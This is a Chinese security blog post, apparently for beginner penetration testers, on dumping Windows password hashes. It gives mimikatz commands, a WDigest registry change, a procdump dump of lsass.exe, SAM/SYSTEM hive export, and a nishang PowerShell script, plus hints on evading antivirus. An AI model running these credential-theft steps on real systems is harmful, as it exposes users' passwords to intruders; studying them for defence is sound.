有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!
一 猕猴桃mimikatz
实验环境 win7
适用于Windows 8.1 和 Windows Server 2012 R2 之前
privilege::debug
sekurlsa::logonpasswords
实验环境 win10
Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储
可以读到hash
所有我们要修改注册表
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
将 UseLogonCredential 设置为 1 然后重启
Shutdown -r -t 0
再用猕猴桃就可以获取到密码了
privilege::debug
sekurlsa::logonpasswords
或者 管理员打开cmd运行procdump导出dmp
https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。
procdump64.exe -accepteula -ma lsass.exe 12.dmp
然后放到猕猴桃的目录
sekurlsa::minidump 12.dmp
sekurlsa::logonpasswords full
二 注册表获取sam文件
从注册表导出
reg save hklmsam e:sam.hive
reg save hklmsystem e:system.hive
其中hklm 代表 "HKEY_LOCAL_MACHINE",这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。
把这两个hive放到猕猴桃目录
lsadump::sam /sam:sam.hive /system:system.hive
实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。
希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。
三 powershell
用原版肯定被杀,有能力的可以做一下免杀
https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1
powershell -exec bypass "import-module .Get-PassHashes.ps1;Get-PassHashes"
有师傅说,开赞赏可以增加浏览量,故麋鹿开了该功能,如果您喜欢我们的文章,想让更多的人看到我们的公众号,或者给我们一点小小的鼓励,请您点个赞和再看就行了,如果手头宽裕,打赏一分钱就好啦,谢谢您的喜欢!
原文始发于微信公众号(麋鹿安全):windows获取hash常见手法
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论